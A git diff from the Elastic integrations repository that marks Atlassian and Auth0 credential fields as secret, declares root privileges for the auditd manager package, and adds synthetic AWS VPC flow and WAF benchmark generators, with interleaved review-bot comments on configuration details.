@@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.24.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.23.2" changes: - description: Changed owners diff --git a/packages/atlassian_confluence/data_stream/audit/manifest.yml b/packages/atlassian_confluence/data_stream/audit/manifest.yml index f713df4dd04..e84cc2d7b86 100644 --- a/packages/atlassian_confluence/data_stream/audit/manifest.yml +++ b/packages/atlassian_confluence/data_stream/audit/manifest.yml @@ -80,6 +80,7 @@ streams: multi: false required: false show_user: true + secret: true - name: token type: password title: Personal Access Token @@ -87,6 +88,7 @@ streams: required: false multi: false show_user: true + secret: true - name: atlassian_cloud required: true show_user: true diff --git a/packages/atlassian_confluence/manifest.yml b/packages/atlassian_confluence/manifest.yml index 6837d697aa9..2a69a95862d 100644 --- a/packages/atlassian_confluence/manifest.yml +++ b/packages/atlassian_confluence/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: atlassian_confluence title: Atlassian Confluence -version: "1.23.2" +version: "1.24.0" description: Collect logs from Atlassian Confluence with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - productivity_security conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" icons: - src: /img/confluence-logo.svg title: Confluence Logo diff --git a/packages/atlassian_jira/changelog.yml b/packages/atlassian_jira/changelog.yml index d16e67516bc..760cbed673a 100644 --- a/packages/atlassian_jira/changelog.yml +++ b/packages/atlassian_jira/changelog.yml 
@@ -1,4 +1,9 @@
# newer versions go on top
+- version: "1.24.0"
+ changes:
+ - description: Set sensitive values as secret.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/8725
- version: "1.23.2"
changes:
- description: Changed owners
diff --git a/packages/atlassian_jira/data_stream/audit/manifest.yml b/packages/atlassian_jira/data_stream/audit/manifest.yml
index bca38d19d60..138a6a6eca9 100644
--- a/packages/atlassian_jira/data_stream/audit/manifest.yml
+++ b/packages/atlassian_jira/data_stream/audit/manifest.yml
@@ -80,6 +80,7 @@ streams:
multi: false
required: false
show_user: true
+ secret: true
- name: token
type: password
title: Personal Access Token
@@ -87,6 +88,7 @@ streams:
required: false
multi: false
show_user: true
+ secret: true
- name: atlassian_cloud
required: true
show_user: true
diff --git a/packages/atlassian_jira/manifest.yml b/packages/atlassian_jira/manifest.yml
index e8d4ab5c603..cbf75954b0a 100644
--- a/packages/atlassian_jira/manifest.yml
+++ b/packages/atlassian_jira/manifest.yml
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
name: atlassian_jira
title: Atlassian Jira
-version: "1.23.2"
+version: "1.24.0"
description: Collect logs from Atlassian Jira with Elastic Agent.
type: integration
categories:
@@ -9,7 +9,7 @@ categories:
- productivity_security
conditions:
kibana:
- version: "^8.7.1"
+ version: "^8.12.0"
icons:
- src: /img/jira-software-logo.svg
title: Jira Software Logo
diff --git a/packages/auditd_manager/changelog.yml b/packages/auditd_manager/changelog.yml
index eadd535143a..47ed9ab96e3 100644
--- a/packages/auditd_manager/changelog.yml
+++ b/packages/auditd_manager/changelog.yml
@@ -1,4 +1,9 @@
# newer versions go on top
+- version: "1.16.3"
+ changes:
+ - description: capture root requirement
+ type: enhancement
+ link: https://github.com/elastic/integrations/issues/8647
- version: "1.16.2"
changes:
- description: Changed owners
diff --git a/packages/auditd_manager/manifest.yml b/packages/auditd_manager/manifest.yml
index 13e3952ca46..920a5c40d80 100644
--- a/packages/auditd_manager/manifest.yml
+++ b/packages/auditd_manager/manifest.yml
@@ -1,7 +1,7 @@
format_version: "3.0.0"
name: auditd_manager
title: "Auditd Manager"
-version: "1.16.2"
+version: "1.16.3"
description: "The Auditd Manager Integration receives audit events from the Linux Audit Framework that is a part of the Linux kernel."
type: integration
categories:
@@ -36,6 +36,9 @@ policy_templates:
- type: audit/auditd
title: Collect auditd events
description: Collecting auditd events
+agent:
+ privileges:
+ root: true
owner:
github: elastic/sec-linux-platform
type: elastic
diff --git a/packages/auth0/changelog.yml b/packages/auth0/changelog.yml
index 0b7d7103d05..a0a8fa2997c 100644
--- a/packages/auth0/changelog.yml
+++ b/packages/auth0/changelog.yml
@@ -1,4 +1,9 @@
# newer versions go on top
+- version: "1.15.0"
+ changes:
+ - description: Set sensitive values as secret.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/8725
- version: "1.14.2"
changes:
- description: Changed owners
diff --git a/packages/auth0/data_stream/logs/manifest.yml b/packages/auth0/data_stream/logs/manifest.yml
index 0e7b6a206db..1d7a34d5d5c 100644
--- a/packages/auth0/data_stream/logs/manifest.yml
+++ b/packages/auth0/data_stream/logs/manifest.yml
@@ -30,11 +30,12 @@ streams:
show_user: false
default: /auth0/logs
- name: secret_value
- type: text
+ type: password
description: Authorization token
multi: false
required: false
show_user: true
+ secret: true
- name: ssl
type: yaml
title: TLS
diff --git a/packages/auth0/manifest.yml b/packages/auth0/manifest.yml
index d3c34b02a9d..3c28fe3fd23 100644
--- a/packages/auth0/manifest.yml
+++ b/packages/auth0/manifest.yml
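Review bot: `agent.privileges.root: true` is added while `format_version` stays at `"3.0.0"` in the first hunk; I cannot tell from this diff which package-spec version introduced the `agent.privileges` key, so confirm `elastic-package lint` accepts it under 3.0.0 rather than assuming the `3.0.2` bumps elsewhere in this commit (which appear to accompany `secret: true`) are unrelated. Declaring root is a reasonable call for a collector that reads the Linux audit framework, but it is a blunt, package-wide requirement with no capability-scoped alternative in the manifest, so the user-facing README (not in this diff) should say so explicitly, e.g. a Requirements line: "Elastic Agent must run as root for this integration; it needs privileged access to the kernel audit framework." The changelog text `capture root requirement` could be expanded to match, e.g. `Declare that the integration requires Elastic Agent to run as root.`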
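Review bot: `secret_value` gains `type: password` and `secret: true` but still has no `title`, so the Fleet form will presumably keep labelling the now-masked input with the raw variable name; add `title: Authorization Token` between `name` and `type`. The one-line `description: Authorization token` also does not say which token this is — I assume it is the secret Auth0 sends with each log-stream webhook request, but that is not visible in this hunk, so only extend the description once confirmed. Keeping `required: false` is consistent with the rest of the variable block.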
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
name: auth0
title: "Auth0"
-version: "1.14.2"
+version: "1.15.0"
description: Collect logs from Auth0 with Elastic Agent.
type: integration
categories:
@@ -9,7 +9,7 @@ categories:
- iam
conditions:
kibana:
- version: ^8.7.1
+ version: ^8.12.0
screenshots:
- src: /img/auth0-screenshot.png
title: Auth0 Dashboard
diff --git a/packages/aws/_dev/benchmark/rally/ec2logs-benchmark.yml b/packages/aws/_dev/benchmark/rally/ec2_logs-benchmark.yml
similarity index 100%
rename from packages/aws/_dev/benchmark/rally/ec2logs-benchmark.yml
rename to packages/aws/_dev/benchmark/rally/ec2_logs-benchmark.yml
diff --git a/packages/aws/_dev/benchmark/rally/ec2metrics-benchmark.yml b/packages/aws/_dev/benchmark/rally/ec2_metrics-benchmark.yml
similarity index 100%
rename from packages/aws/_dev/benchmark/rally/ec2metrics-benchmark.yml
rename to packages/aws/_dev/benchmark/rally/ec2_metrics-benchmark.yml
diff --git a/packages/aws/_dev/benchmark/rally/vpcflow-benchmark.yml b/packages/aws/_dev/benchmark/rally/vpcflow-benchmark.yml
new file mode 100644
index 00000000000..f32864483de
--- /dev/null
+++ b/packages/aws/_dev/benchmark/rally/vpcflow-benchmark.yml
@@ -0,0 +1,14 @@
+---
+description: Benchmark 20000 aws.vpcflow events ingested
+data_stream:
+ name: vpcflow
+corpora:
+ generator:
+ total_events: 20000
+ template:
+ type: gotext
+ path: ./vpcflow-benchmark/template.ndjson
+ config:
+ path: ./vpcflow-benchmark/config.yml
+ fields:
+ path: ./vpcflow-benchmark/fields.yml
diff --git a/packages/aws/_dev/benchmark/rally/vpcflow-benchmark/config.yml b/packages/aws/_dev/benchmark/rally/vpcflow-benchmark/config.yml
new file mode 100644
index 00000000000..8b138167f7a
--- /dev/null
+++ b/packages/aws/_dev/benchmark/rally/vpcflow-benchmark/config.yml
@@ -0,0 +1,59 @@ +fields: + - name: timestamp + period: -24h + - name: cloud_region + enum: ["ap-east-1", "ap-northeast-1", "ap-northeast-2", "ap-northeast-3", "ap-south-1", "ap-southeast-1", "ap-southeast-2", "ca-central-1", "eu-central-1", "eu-north-1", "eu-west-1", "eu-west-2", "eu-west-3", "me-south-1", "sa-east-1", "us-east-1", "us-east-2", "us-west-1", "us-west-2"] + - name: network_direction + enum: ["ingress", "egress"] + - name: duration_start + enum: ["-1h", "-2h", "-3h", "-4h"] + - name: duration_end + enum: ["-30m", "-20m", "-10m", "-40m"] + - name: long_num + range: + min: 100000000 + max: 200000000 + - name: aws_vpcflow_version + enum: ["2", "3", "5"] + - name: aws_vpcflow_account_id + range: + min: 100000000000 + max: 300000000000 + - name: aws_vpcflow_action + enum: ["ACCEPT", "REJECT"] + - name: log_status + enum: ["OK", "NODATA", "SKIPDATA"] + - name: aws_vpcflow_tcp_flags + enum: ["0", "1", "2", "3", "4", "18", "19"] + - name: aws_vpcflow_pkt_dst_service + enum: ["AMAZON", "AMAZON_APPFLOW", "AMAZON_CONNECT", "API_GATEWAY", "CHIME_MEETINGS", "CHIME_VOICECONNECTOR", "CLOUD9", "CLOUDFRONT", "CODEBUILD", "DYNAMODB", "EBS", "EC2", "EC2_INSTANCE_CONNECT", "GLOBALACCELERATOR", "KINESIS_VIDEO_STREAMS", "ROUTE53", "ROUTE53_HEALTHCHECKS", "ROUTE53_HEALTHCHECKS_PUBLISHING", "ROUTE53_RESOLVER", "S3", "WORKSPACES_GATEWAYS"] + - name: aws_vpcflow_pkt_src_service + enum: ["AMAZON", "AMAZON_APPFLOW", "AMAZON_CONNECT", "API_GATEWAY", "CHIME_MEETINGS", "CHIME_VOICECONNECTOR", "CLOUD9", "CLOUDFRONT", "CODEBUILD", "DYNAMODB", "EBS", "EC2", "EC2_INSTANCE_CONNECT", "GLOBALACCELERATOR", "KINESIS_VIDEO_STREAMS", "ROUTE53", "ROUTE53_HEALTHCHECKS", "ROUTE53_HEALTHCHECKS_PUBLISHING", "ROUTE53_RESOLVER", "S3", "WORKSPACES_GATEWAYS"] + - name: aws_vpcflow_traffic_path + range: + min: 1 + max: 8 + - name: aws_vpcflow_sublocation_type + enum: ["wavelength", "outpost", "localzone"] + - name: aws_vpcflow_srcport + range: + min: 0 + max: 65535 + - name: aws_vpcflow_dstport + 
range: + min: 0 + max: 65535 + - name: aws_vpcflow_protocol + enum: ["1", "2", "6", "17", "47", "58", "132"] + - name: aws_vpcflow_packets + range: + min: 0 + max: 100 + - name: aws_vpcflow_bytes + range: + min: 0 + max: 10000 + - name: bucket_num + range: + min: 63461 + max: 63471 diff --git a/packages/aws/_dev/benchmark/rally/vpcflow-benchmark/fields.yml b/packages/aws/_dev/benchmark/rally/vpcflow-benchmark/fields.yml new file mode 100644 index 00000000000..8c1bc2982ee --- /dev/null +++ b/packages/aws/_dev/benchmark/rally/vpcflow-benchmark/fields.yml @@ -0,0 +1,61 @@ +- name: timestamp + type: date +- name: cloud_region + type: keyword +- name: network_direction + type: keyword +- name: aws_vpcflow_version + type: keyword +- name: aws_vpcflow_account_id + type: long +- name: aws_vpcflow_interface_id + type: keyword +- name: aws_vpcflow_action + type: keyword +- name: log_status + type: keyword +- name: aws_vpcflow_pkt_srcaddr + type: ip +- name: aws_vpcflow_pkt_dstaddr + type: ip +- name: aws_vpcflow_vpc_id + type: keyword +- name: long_num + type: long +- name: aws_vpcflow_subnet_id + type: keyword +- name: aws_vpcflow_tcp_flags + type: keyword +- name: aws_vpcflow_pkt_dst_service + type: keyword +- name: aws_vpcflow_pkt_src_service + type: keyword +- name: aws_vpcflow_traffic_path + type: long +- name: aws_vpcflow_sublocation_type + type: keyword +- name: aws_vpcflow_sublocation_id + type: keyword +- name: aws_vpcflow_srcaddr + type: ip +- name: aws_vpcflow_dstaddr + type: ip +- name: aws_vpcflow_srcport + type: long +- name: aws_vpcflow_dstport + type: long +- name: aws_vpcflow_protocol + type: keyword +- name: aws_vpcflow_packets + type: long +- name: aws_vpcflow_bytes + type: long +- name: duration_start + type: keyword +- name: duration_end + type: keyword +- name: file_name + type: keyword + example: extra-samples +- name: bucket_num + type: long 
diff --git a/packages/aws/_dev/benchmark/rally/vpcflow-benchmark/template.ndjson b/packages/aws/_dev/benchmark/rally/vpcflow-benchmark/template.ndjson new file mode 100644 index 00000000000..2be8975cf74 --- /dev/null +++ b/packages/aws/_dev/benchmark/rally/vpcflow-benchmark/template.ndjson 
@@ -0,0 +1,86 @@ +{{- $timestamp := generate "timestamp" }} +{{- $cloud_region := generate "cloud_region" }} +{{- $cloud_availability_zone := awsAZFromRegion (print $cloud_region) }} +{{- $network_direction := generate "network_direction" }} +{{- $duration_start := generate "duration_start" }} +{{- $duration_end := generate "duration_end" }} +{{- $aws_vpcflow_start := $timestamp | date_modify (print $duration_start) }} +{{- $aws_vpcflow_end := $timestamp | date_modify (print $duration_end) }} +{{- $aws_vpcflow_version := generate "aws_vpcflow_version" }} +{{- $aws_vpcflow_account_id := generate "aws_vpcflow_account_id" }} +{{- $aws_vpcflow_interface_id := generate "aws_vpcflow_interface_id" }} +{{- $aws_vpcflow_action := generate "aws_vpcflow_action" }} +{{- $log_status := generate "log_status" }} +{{- $aws_vpcflow_pkt_srcaddr := generate "aws_vpcflow_pkt_srcaddr" }} +{{- $aws_vpcflow_pkt_dstaddr := generate "aws_vpcflow_pkt_dstaddr" }} +{{- $aws_vpcflow_vpc_id := generate "aws_vpcflow_vpc_id" }} +{{- $aws_vpcflow_subnet_id := generate "aws_vpcflow_subnet_id" }} +{{- $aws_vpcflow_tcp_flags := generate "aws_vpcflow_tcp_flags" }} +{{- $aws_vpcflow_pkt_dst_service := generate "aws_vpcflow_pkt_dst_service" }} +{{- $aws_vpcflow_pkt_src_service := generate "aws_vpcflow_pkt_src_service" }} +{{- $aws_vpcflow_traffic_path := generate "aws_vpcflow_traffic_path" }} +{{- $aws_vpcflow_sublocation_type := generate "aws_vpcflow_sublocation_type" }} +{{- $aws_vpcflow_sublocation_id := generate "aws_vpcflow_sublocation_id" }} +{{- $aws_vpcflow_srcaddr := generate "aws_vpcflow_srcaddr" }} +{{- $aws_vpcflow_dstaddr := generate "aws_vpcflow_dstaddr" }} +{{- $aws_vpcflow_srcport := generate "aws_vpcflow_srcport" }} +{{- $aws_vpcflow_dstport := generate "aws_vpcflow_dstport" }} +{{- $aws_vpcflow_protocol := generate "aws_vpcflow_protocol" }} +{{- $aws_vpcflow_packets := generate "aws_vpcflow_packets" }} +{{- $aws_vpcflow_bytes := generate "aws_vpcflow_bytes" }} +{{- $long_num := 
generate "long_num" }} +{{- $file_name := generate "file_name" }} +{{- $bucket_num := generate "bucket_num" }} +{ + "@timestamp": "{{ $timestamp.Format "2006-01-02T15:04:05.000Z" }}", + "agent": { + "ephemeral_id": "22ed892c-43bd-408a-9121-65e2f5b6a56e", + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "name": "aws-scale-123456", + "type": "filebeat", + "version": "8.8.0" + }, + "aws": { + "s3": { + "bucket": { + "arn": "arn:aws:s3:::elastic-package-aws-bucket-{{ $bucket_num }}", + "name": "elastic-package-aws-bucket-{{ $bucket_num }}" + }, + "object": { + "key": "{{ $file_name }}.log" + } + } + }, + "data_stream": { + "dataset": "aws.vpcflow", + "namespace": "ep", + "type": "logs" + }, + "elastic_agent": { + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "snapshot": false, + "version": "8.8.0" + }, + "event": { + "dataset": "aws.vpcflow", + {{- if eq $log_status "OK"}} + "original" : "{\"message\":\"{{ $aws_vpcflow_version }} {{ $aws_vpcflow_account_id }} eni-{{ $aws_vpcflow_interface_id }}{{ mul $long_num 2 }} {{ $aws_vpcflow_srcaddr }} {{ $aws_vpcflow_dstaddr }} {{ $aws_vpcflow_srcport }} {{ $aws_vpcflow_dstport }} {{ $aws_vpcflow_protocol }} {{ $aws_vpcflow_packets }} {{ $aws_vpcflow_bytes }} {{ $aws_vpcflow_start.Unix }} {{ $aws_vpcflow_end.Unix }} {{ $aws_vpcflow_action }} {{ $log_status }} vpc-{{ $aws_vpcflow_vpc_id }}{{ $long_num }} subnet-{{ $aws_vpcflow_subnet_id }}{{ $long_num }} i-{{ $long_num }}{{ $long_num }} {{ $aws_vpcflow_tcp_flags }} IPv4 {{ $aws_vpcflow_pkt_srcaddr }} {{ $aws_vpcflow_pkt_dstaddr }} {{ $cloud_region }} {{ $cloud_availability_zone }} {{ $aws_vpcflow_sublocation_type }} {{ $aws_vpcflow_sublocation_id }} {{ $aws_vpcflow_pkt_src_service }} {{ $aws_vpcflow_pkt_dst_service }} {{ $network_direction }} {{ $aws_vpcflow_traffic_path }}\"}" + {{- else}} + "original" : "{\"message\":\"{{ $aws_vpcflow_version }} {{ $aws_vpcflow_account_id }} eni-{{ $aws_vpcflow_interface_id }}{{ mul $long_num 2 }} - - - - - - - {{ $aws_vpcflow_start.Unix }} 
{{ $aws_vpcflow_end.Unix }} - {{ $log_status }}\"}" + {{- end}} + }, + "input": { + "type": "aws-s3" + }, + "log": { + "file": { + "path": "https://elastic-package-aws-bucket-{{ $bucket_num }}.s3.{{ $cloud_region }}.amazonaws.com/{{ $file_name }}.log" + }, + "offset": 338 + }, + "tags": [ + "preserve_original_event", + "forwarded", + "aws-vpcflow" + ] +} \ No newline at end of file diff --git a/packages/aws/_dev/benchmark/rally/waf-benchmark.yml b/packages/aws/_dev/benchmark/rally/waf-benchmark.yml new file mode 100644 index 00000000000..91a94825304 --- /dev/null +++ b/packages/aws/_dev/benchmark/rally/waf-benchmark.yml @@ -0,0 +1,14 @@ +--- +description: Benchmark of 20000 aws.waf events ingested +data_stream: + name: waf +corpora: + generator: + total_events: 20000 + template: + type: gotext + path: ./waf-benchmark/template.ndjson + config: + path: ./waf-benchmark/config.yml + fields: + path: ./waf-benchmark/fields.yml diff --git a/packages/aws/_dev/benchmark/rally/waf-benchmark/config.yml b/packages/aws/_dev/benchmark/rally/waf-benchmark/config.yml new file mode 100644 index 00000000000..d50cfb302bb --- /dev/null +++ b/packages/aws/_dev/benchmark/rally/waf-benchmark/config.yml 
@@ -0,0 +1,47 @@
+fields:
+ - name: timestamp
+ period: -24h
+ - name: event_duration
+ range:
+ min: 1
+ max: 10000000
+ - name: cloud_region
+ enum: ["ap-east-1", "ap-northeast-1", "ap-northeast-2", "ap-northeast-3", "ap-south-1", "ap-southeast-1", "ap-southeast-2", "ca-central-1", "eu-central-1", "eu-north-1", "eu-west-1", "eu-west-2", "eu-west-3", "me-south-1", "sa-east-1", "us-east-1", "us-east-2", "us-west-1", "us-west-2"]
+ - name: rule_id
+ enum: ["STMTest_SQLi_XSS", "Default_Action"]
+ - name: rule_ruleset
+ enum: ["REGULAR", "GROUP", "RATE_BASED", "MANAGED_RULE_GROUP"]
+ - name: event_action
+ enum: ["ALLOW", "BLOCK"]
+ - name: aws_waf_source_name
+ value: ["CF", "APIGW", "ALB", "APPSYNC", "COGNITOIDP", "APPRUNNER", "VERIFIED_ACCESS"]
+ - name: condition_type
+ enum: ["SQL_INJECTION", "XSS", "REGEX"]
+ - name: matched_data
+ range:
+ min: 1
+ max: 100
+ - name: http_method
+ enum: ["GET", "POST", "PUT", "DELETE"]
+ - name: bucket_num
+ range:
+ min: 63461
+ max: 63471
+ - name: cloud_account_id
+ range:
+ min: 100000000000
+ max: 300000000000
+ - name: rangeofid
+ range:
+ min: 0
+ max: 10000
+ - name: args
+ enum: ["ver=5.0.3", "", "ver=1.1"]
+ - name: uri_extension
+ enum: [".css", ".png", ".min.css"]
+ - name: long_num
+ range:
+ min: 1000000000
+ max: 2000000000
+ - name: country_codes
+ enum: ["AU", "US", "IN", "GR", "FR", "NZ", "NP"]
diff --git a/packages/aws/_dev/benchmark/rally/waf-benchmark/fields.yml b/packages/aws/_dev/benchmark/rally/waf-benchmark/fields.yml
new file mode 100644
index 00000000000..5c33fe76ea1
--- /dev/null
+++ b/packages/aws/_dev/benchmark/rally/waf-benchmark/fields.yml
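Review bot: `aws_waf_source_name` is the only enumerated field in this config that uses `value:` instead of `enum:`, and it is given a list; every other choice field here (`rule_id`, `event_action`, `http_method`, …) uses `enum:`. As written the generator would presumably treat the whole list as a single fixed value (or reject it) rather than picking one of `CF`, `APIGW`, … per event, which is what the template's `httpSourceName` field expects. Change it to `enum: ["CF", "APIGW", "ALB", "APPSYNC", "COGNITOIDP", "APPRUNNER", "VERIFIED_ACCESS"]`.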
@@ -0,0 +1,51 @@
+- name: timestamp
+ type: date
+- name: cloud_region
+ type: keyword
+- name: cloud_account_id
+ type: keyword
+- name: client_ip
+ type: ip
+- name: file_name
+ type: keyword
+- name: rangeofid
+ type: integer
+- name: rule_id
+ type: keyword
+- name: rule_ruleset
+ type: keyword
+- name: event_action
+ type: keyword
+- name: aws_waf_rate_based_rule_list
+ type: nested
+- name: aws_waf_rule_group_list
+ type: nested
+- name: aws_waf_non_terminating_matching_rules
+ type: nested
+- name: aws_waf_terminating_rule_match_details
+ type: nested
+- name: aws_waf_source_name
+ type: keyword
+- name: condition_type
+ type: keyword
+- name: location
+ type: keyword
+- name: matched_data
+ type: long
+- name: http_method
+ type: keyword
+- name: file_name
+ type: keyword
+ example: extra-samples
+- name: bucket_num
+ type: long
+- name: args
+ type: keyword
+- name: uri_path
+ type: keyword
+- name: uri_extension
+ type: keyword
+- name: long_num
+ type: long
+- name: country_codes
+ type: keyword
diff --git a/packages/aws/_dev/benchmark/rally/waf-benchmark/template.ndjson b/packages/aws/_dev/benchmark/rally/waf-benchmark/template.ndjson
new file mode 100644
index 00000000000..5fa2d3b43a2
--- /dev/null
+++ b/packages/aws/_dev/benchmark/rally/waf-benchmark/template.ndjson
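Review bot: `file_name` is declared twice in this fields file — once near the top as a bare `type: keyword`, and again after `http_method` with `example: extra-samples` — and the two entries disagree, so whichever one the generator honours is a matter of load order; drop the first `- name: file_name` / `type: keyword` pair so there is one definition. Separately, `cloud_account_id` is typed `keyword` here although config.yml feeds it from a numeric `range`, while the vpcflow fields file in this same commit types its account id as `long`; either works, but picking one keeps the two benchmarks comparable.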
@@ -0,0 +1,76 @@ +{{- $timestamp := generate "timestamp" }} +{{- $cloud_region := generate "cloud_region" }} +{{- $cloud_account_id := generate "cloud_account_id" }} +{{- $file_name := generate "file_name" }} +{{- $rangeofid := generate "rangeofid" }} +{{- $rule_id := generate "rule_id" }} +{{- $rule_ruleset := generate "rule_ruleset" }} +{{- $event_action := generate "event_action" }} +{{- $aws_waf_rate_based_rule_list := generate "aws_waf_rate_based_rule_list" }} +{{- $aws_waf_rule_group_list := generate "aws_waf_rule_group_list" }} +{{- $aws_waf_non_terminating_matching_rules := generate "aws_waf_non_terminating_matching_rules" }} +{{- $aws_waf_terminating_rule_match_details := generate "aws_waf_terminating_rule_match_details" }} +{{- $aws_waf_source_name := generate "aws_waf_source_name" }} +{{- $client_ip := generate "client_ip" }} +{{- $condition_type := generate "condition_type" }} +{{- $location := generate "location" }} +{{- $matched_data := generate "matched_data" }} +{{- $http_method := generate "http_method" }} +{{- $bucket_num := generate "bucket_num" }} +{{- $args := generate "args" }} +{{- $uri_path := generate "uri_path" }} +{{- $uri_extension := generate "uri_extension" }} +{{- $long_num := generate "long_num" }} +{{- $country_codes := generate "country_codes" }} +{ + "@timestamp": "{{ $timestamp.Format "2006-01-02T15:04:05.000Z" }}", + "agent": { + "ephemeral_id": "22ed892c-43bd-408a-9121-65e2f5b6a56e", + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "name": "aws-scale-123456", + "type": "filebeat", + "version": "8.8.0" + }, + "aws": { + "s3": { + "bucket": { + "arn": "arn:aws:s3:::elastic-package-aws-bucket-{{ $bucket_num }}", + "name": "elastic-package-aws-bucket-{{ $bucket_num }}" + }, + "object": { + "key": "{{ $file_name }}.log" + } + } + }, + "data_stream": { + "dataset": "aws.waf", + "namespace": "ep", + "type": "logs" + }, + "elastic_agent": { + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "snapshot": false, + "version": "8.8.0" + }, 
+ {{- if eq $rule_id "Default_Action" }} + "message": "{\"timestamp\":{{ $timestamp.UnixMilli }},\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:{{ $cloud_region }}:{{ $cloud_account_id }}:9b3b8307-f0d8-4425-bd32-499444d92ea1\",\"terminatingRuleId\":\"{{ $rule_id }}\",\"terminatingRuleType\":\"{{ $rule_ruleset }}\",\"action\":\"{{ $event_action }}\",\"httpSourceName\":\"{{ $aws_waf_source_name }}\",\"httpSourceId\":\"{{ $long_num }}-app/wordpress/d3fad233572a26a0\",\"ruleGroupList\":[],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"httpRequest\":{\"clientIp\":\"{{ $client_ip}}\",\"country\":\"{{ $country_codes }}\",\"headers\":[{\"name\":\"Host\",\"value\":\"wordpress-{{ $long_num }}.{{ $cloud_region }}.elb.amazonaws.com\"},{\"name\":\"User-Agent\",\"value\":\"Apache-HttpClient/4.5.6 (Java/1.8.0_191)\"}],\"uri\":\"/wp-content/{{ $uri_path }}{{ $uri_extension }}\",\"args\":\"{{ $args }}\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"{{ $http_method }}\",\"requestId\":\"rid-{{ $rangeofid }}\"}}", + {{- else}} + "message": "{\"timestamp\":{{ $timestamp.UnixMilli }},\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:{{ $cloud_region }}:{{ $cloud_account_id }}:9b3b8307-f0d8-4425-bd32-499444d92ea1\",\"terminatingRuleId\":\"{{ $rule_id }}\",\"terminatingRuleType\":\"{{ $rule_ruleset }}\",\"action\":\"{{ $event_action }}\",\"terminatingRuleMatchDetails\": [{\"conditionType\": \"{{ $condition_type }}\",\"location\": \"{{ generate "location" }}\",\"matchedData\": [\"{{ $matched_data }}\",\"AND\",\"{{ $matched_data }}\"]}],\"httpSourceName\":\"{{ $aws_waf_source_name }}\",\"httpSourceId\":\"{{ $long_num }}-app/wordpress/d3fad233572a26a0\",\"ruleGroupList\":[],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"requestHeadersInserted\":null,\"responseCodeSent\":null,\"httpRequest\":{\"clientIp\":\"{{ $client_ip}}\",\"country\":\"{{ $country_codes }}\",\"headers\":[{\"name\":\"Host\",\"value\":\"wordpress-{{ $long_num }}.{{ $cloud_region 
}}.elb.amazonaws.com\"},{\"name\":\"User-Agent\",\"value\":\"Apache-HttpClient/4.5.6 (Java/1.8.0_191)\"}],\"uri\":\"/wp-content/{{ $uri_path }}{{ $uri_extension }}\",\"args\":\"{{ $args }}\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"{{ $http_method }}\",\"requestId\":\"rid-{{ $rangeofid }}\"}}", + {{- end}} + "event": { + "dataset": "aws.waf" + }, + "input": { + "type": "aws-s3" + }, + "log": { + "file": { + "path": "https://elastic-package-aws-bucket-{{ $bucket_num }}.s3.us-east-1.amazonaws.com/waf.log" + }, + "offset": 0 + }, + "tags": [ + "forwarded", + "aws-waf" + ] +} \ No newline at end of file diff --git a/packages/aws/_dev/build/docs/billing.md b/packages/aws/_dev/build/docs/billing.md index 867dd256369..b5cf249b2c8 100644 --- a/packages/aws/_dev/build/docs/billing.md +++ b/packages/aws/_dev/build/docs/billing.md @@ -8,6 +8,11 @@ For example, you could use this data to easily view your total estimated charges **IMPORTANT: Extra AWS charges on AWS API requests will be generated by this integration. Please refer to the AWS integration for more details.** +## Limitations + +When you want to group by a combination of several tags and dimensions, like `SERVICE` along with various tags (e.g., `team`, `project`, `aws:createdBy`), you might see duplicated data. This happens because of a [limitation](https://docs.aws.amazon.com/aws-cost-management/latest/APIReference/API_GetCostAndUsage.html) with the `GetCostAndUsage` API, which only allows grouping costs by two different groups. + +To avoid data duplication, it's recommended to aggregate data using a combination of two attributes, which can be either: one tag and one dimension, two tags or two dimensions. ## Data streams diff --git a/packages/aws/_dev/build/docs/kafka.md b/packages/aws/_dev/build/docs/kafka.md new file mode 100644 index 00000000000..1a2cbac481b --- /dev/null +++ b/packages/aws/_dev/build/docs/kafka.md 
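Review bot: `log.file.path` hard-codes `s3.us-east-1.amazonaws.com/waf.log` although `aws.s3.object.key` earlier in the same document is `{{ $file_name }}.log` and a `$cloud_region` is generated per event, so every benchmark event disagrees with itself about which object and region it came from; the vpcflow template in this commit builds the path from both variables. Suggest `"path": "https://elastic-package-aws-bucket-{{ $bucket_num }}.s3.{{ $cloud_region }}.amazonaws.com/{{ $file_name }}.log"`. Also `$location` is assigned from `generate "location"` in the variable block but the non-default `message` calls `generate "location"` again inline, and `$aws_waf_rate_based_rule_list`, `$aws_waf_rule_group_list`, `$aws_waf_non_terminating_matching_rules` and `$aws_waf_terminating_rule_match_details` are generated and never used (the message emits `[]` or builds the details inline); use `{{ $location }}` and drop the four unused assignments.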
@@ -0,0 +1,48 @@
+# Amazon Managed Streaming for Apache Kafka (MSK)
+
+The Amazon Kafka integration allows you to monitor [Amazon MSK](https://aws.amazon.com/msk/) — it's a fully managed
+service that makes it easy for you to build and run applications that use Apache Kafka to process streaming data
+
+Use the Amazon Kafka integration to collect metrics related to your MSK clusters from CloudWatch. This integration only
+supports collecting DEFAULT level monitoring metrics for now. Once these metrics are sent to Elastic, you can visualize
+them in Kibana, create alerts to notify you if something goes wrong, and reference the metrics when troubleshooting
+an issue.
+
+**IMPORTANT: Extra AWS charges on AWS API requests will be generated by this integration. Please refer to the AWS
+integration for more details.**
+
+## Data streams
+
+The Amazon Kafka integration collects one type of data: metrics.
+
+**Metrics** give you insight into the state of Amazon MSK.
+The metrics collected by the Amazon Kafka integration include bytes received from clients, bytes sent to clients, number
